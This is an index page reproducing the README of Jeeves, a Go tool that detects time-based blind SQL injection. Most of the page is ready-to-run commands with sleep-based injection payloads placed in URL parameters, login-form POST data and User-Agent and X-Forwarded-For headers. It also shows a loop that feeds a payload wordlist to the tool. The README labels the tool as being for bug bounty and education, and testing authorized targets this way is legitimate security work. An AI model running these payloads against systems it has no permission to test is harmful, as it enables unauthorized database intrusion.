Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/ferreiraklet/Jeeves
Jeeves SQLI Finder
https://github.com/ferreiraklet/Jeeves
Last synced: 21 days ago
JSON representation
Jeeves SQLI Finder
- Host: GitHub
- URL: https://github.com/ferreiraklet/Jeeves
- Owner: ferreiraklet
- License: mit
- Created: 2022-03-31T00:12:55.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2022-05-13T16:53:41.000Z (over 2 years ago)
- Last Synced: 2024-08-05T17:29:45.647Z (4 months ago)
- Language: Go
- Size: 131 KB
- Stars: 207
- Watchers: 7
- Forks: 48
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-hacking-lists - ferreiraklet/Jeeves - Jeeves SQLI Finder (Go)
README
[![made-with-Go](https://img.shields.io/badge/made%20with-Go-brightgreen.svg)](http://golang.org)
Jeeves
Jeeves is made for looking to Time-Based Blind SQLInjection through recon.
## Contents:
- [Installation](#--installation--requirements)
- [Usage](#--usage--explanation)
- [Adding Headers](#adding-headers)
- [Using Proxy](#using-proxy)
- [Making Post Request](#post-request)
- [Multiple ways of usage](#another-ways-of-usage)## - Installation & Requirements:
Installing Jeeves 💀
```bash
$ go install github.com/ferreiraklet/Jeeves@latest
```
OR
```bash
$ git clone https://github.com/ferreiraklet/Jeeves.git
$ cd Jeeves
$ go build jeeves.go
$ chmod +x jeeves
$ ./jeeves -h
```## - Usage & Explanation:
In Your recon process, you may find endpoints that can be vulnerable to sql injection,
Ex: https://redacted.com/index.php?id=1
### Single urls```bash
echo 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves -t payload_time
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves -t 10
```In --payload-time you must use the time mentioned in payload
### From list
```cat targets | jeeves --payload-time 5```
### Adding HeadersPay attention to the syntax! Must be the same =>
```bash
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -H "Testing: testing;OtherHeader: Value;Other2: Value"
```### Using proxy
```bash
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 --proxy "http://ip:port"
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -p "http://ip:port"
```Proxy + Headers =>
```bash
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://ip:port" -H "User-Agent: xxxx"
```### Post Request
Sending data through post request ( login forms, etc )
Pay attention to the syntax! Must be equal! ->
```bash
echo "https://example.com/Login.aspx" | jeeves -t 10 -d "user=(select(0)from(select(sleep(5)))v)&password=xxx"
echo "https://example.com/Login.aspx" | jeeves -t 10 -H "Header1: Value1" -d "username=admin&password='+(select*from(select(sleep(5)))a)+'" -p "http://yourproxy:port"
```## Another ways of Usage
You are able to use of Jeeves with other tools, such as gau, gauplus, waybackurls, qsreplace and bhedak, mastering his strenght
**Command line flags**:
```bash
Usage:
-t, --payload-time, The time from payload
-p, --proxy Send traffic to a proxy
-c Set Concurrency, Default 25
-H, --headers Custom Headers
-d, --data Sending Post request with data
-h Show This Help Message
```
Using with sql payloads wordlist
```bash
cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves -t 5;done
```Testing in headers
```bash
echo "https://target.com" | jeeves -H "User-Agent: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10
echo "https://target.com" | jeeves -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10Payload credit: https://github.com/rohit0x5
```OBS:
* Does not follow redirects, If the Status Code is diferent than 200, it returns "Need Manual Analisys"
* Jeeves does not http probing, he is not able to do requests to urls that does not contain protocol ( http://, https:// )## This project is for educational and bug bounty porposes only! I do not support any illegal activities!.
If any error in the program, talk to me immediatly.
## Please, also check these =>
> [Nilo](https://github.com/ferreiraklet/nilo) - Checks if URL has status 200> [SQLMAP](https://github.com/sqlmapproject/sqlmap)
> [Blisqy](https://github.com/JohnTroony/Blisqy) Header time based SQLI